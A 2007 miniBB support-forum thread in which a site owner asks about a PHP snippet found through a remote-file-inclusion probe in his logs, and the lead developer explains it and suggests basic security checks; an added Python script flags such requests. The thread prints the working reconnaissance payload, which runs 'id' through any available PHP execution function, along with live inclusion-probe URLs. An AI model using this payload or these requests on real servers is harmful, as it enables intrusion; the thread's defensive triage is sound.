miniBB Support Forums

Suspicious HTTP requests from the log files

Author kolia
Registered
#1 | Posted: 27 Sep 2007 05:58 
Hi guys! I have been using miniBB for a year now, and recently started to notice some weird traffic from xxx content sites. I checked the referrers of the link, and there was one strange bit of PHP that I am not strong enough to understand. Maybe somebody knows what it can be?


// Print a marker string plus OS, kernel and free disk space of the host it runs on
$dir = @getcwd();
$ker = @php_uname();
echo "31337<br>";
$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
// Run the "id" command and print its output
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;

// Run a command through whichever PHP execution function is available
function ex($cfe){
    $res = '';
    if (!empty($cfe)){
        if(function_exists('exec')){
            @exec($cfe,$res);
            $res = join("\n",$res);
        }
        elseif(function_exists('shell_exec')){
            $res = @shell_exec($cfe);
        }
        elseif(function_exists('system')){
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(function_exists('passthru')){
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(@is_resource($f = @popen($cfe,"r"))){
            $res = "";
            while(!@feof($f)) { $res .= @fread($f,1024); }
            @pclose($f);
        }
    }
    return $res;
}

// Format a byte count as B / KB / MB / GB
function view_size($size)
{
    if (!is_numeric($size)) {return FALSE;}
    else
    {
        if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
        elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
        elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
        else {$size = $size . " B";}
        return $size;
    }
}

Author Paul
Lead Developer
#2 | Posted: 27 Sep 2007 11:38 
Hmm, I nearly understand what this code is about, but I don't understand where you've got it from. XXX Traffic? This data can not be executed in referrers I suppose...

Author kolia
Registered
#3 | Posted: 28 Sep 2007 03:05 
Hi Paul, thank you for the reply. In my traffic stats I get this:

Host: 80.172.224.21
/forum/eng.php?img=http://usuarios.arnet.com.ar/larry123/safe.txt?
Http Code: 404 Date: Sep 28 04:34:49 Http Version: HTTP/1.1 Size in Bytes: -
Referer: -
Agent: libwww-perl/5.808

If you remove the ? mark at the end of safe.txt you will get what I posted before.
I don't want to know exactly what it does, I just want to know if I should worry about something or not. Is my forum under attack or was it hacked? :)

Spasibo anyway, I know it's probably not your business, just thought it would be interesting.

Author kolia
Registered
#4 | Posted: 28 Sep 2007 03:19 
Ah OK, I found some info about it: http://www.ossec.net/wiki/index.php/WebAttacks_links#Sites_with_PHP.2FPerl_scripts

Author Paul
Lead Developer
#5 | Posted: 28 Sep 2007 04:41 | Edited by: Paul 
Well, I could say only miniBB traffic is full of such stuff and even more :-)

For example from our logs (minibbtest):

/http://indir.savsak.com/shell.txt

minibb-test.php+[plm=0]+get+http://
minibb.org/minibb-test.php+[0,33753,33538]+->+[n]+post+http://minibb.org/minibb-test.php

/testhttp://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt

The hackers will always send such requests, and there is nothing dangerous until you have a safe, up-to-date version of PHP, probably MySQL and the latest release of miniBB of course.

The code you are referring to in that case will try to execute on the malicious server and provide some info about this server to the hacker, like disk space available and system information. I suppose this code does nothing dangerous and just checks. It probably works only if there's some hole in PHP root code which has been discovered in the past.

You could check your system for basic security by executing the _install.php file which comes by default in the miniBB package, with the 'analysis' parameter, i.e.

_install.php?analysis

It should give information regarding PHP version, register_globals, safe_mode and vulnerable folder. These are the basic things to know to be protected.

I think having just what you see in your logs is not a reason for worrying. But if you see some strange unknown files under your forums folder which do not come by default with miniBB, it is worth investigating where they come from.
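
The kind of log triage discussed in posts #3 and #5, as an added example that is not part of the original thread or of miniBB: it flags requests whose path or query parameters carry a remote URL, the pattern in the entries quoted above. The function names, the reason strings and the 192.0.2.x / example.org records are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

REMOTE_URL = re.compile(r"(?:https?|ftp)://", re.IGNORECASE)
SCRIPTED_AGENTS = ("libwww-perl",)  # agent string from the request in post #3

# Constructed sample records (host, request target, user agent). The first and
# third reuse targets quoted in the thread; the other three are made up.
SAMPLE = [
    ("80.172.224.21", "/forum/eng.php?img=http://usuarios.arnet.com.ar/larry123/safe.txt?", "libwww-perl/5.808"),
    ("192.0.2.10", "/forum/index.php?action=vthread&forum=1&topic=42", "Mozilla/5.0"),
    ("192.0.2.11", "/testhttp://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt", "Mozilla/5.0"),
    ("192.0.2.12", "/forum/index.php?url=http%3A%2F%2Fexample.org%2Fa.txt%3F", "libwww-perl/5.808"),
    ("192.0.2.13", "/forum/index.php", "libwww-perl/5.808"),
]

def probe_reasons(target, agent=""):
    """Return the reasons a request looks like a remote-include probe."""
    reasons = []
    path, _, query = target.partition("?")
    if REMOTE_URL.search(unquote(path)):
        reasons.append("remote URL embedded in path")
    # parse_qsl percent-decodes values, so encoded URLs are caught as well.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_URL.match(value.strip()):
            reasons.append(f"parameter '{name}' holds a remote URL")
            if value.endswith("?"):
                reasons.append("remote URL ends with '?'")
    # A scripted agent alone is a weak signal; report it only as support.
    if reasons and any(a in agent.lower() for a in SCRIPTED_AGENTS):
        reasons.append("scripted user agent")
    return reasons

def scan(records):
    """Return (host, target, reasons) for every flagged record."""
    flagged = []
    for host, target, agent in records:
        reasons = probe_reasons(target, agent)
        if reasons:
            flagged.append((host, target, reasons))
    return flagged
```

When reviewing flagged entries, check the status code too: the request in post #3 was answered with 404, so the requested script was not found, while a 200 on a flagged request is the one to look at first.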

Author kolia
Registered
#6 | Posted: 28 Sep 2007 04:52 
Thank you very much Paul!
Spasibo Bolshoye:)
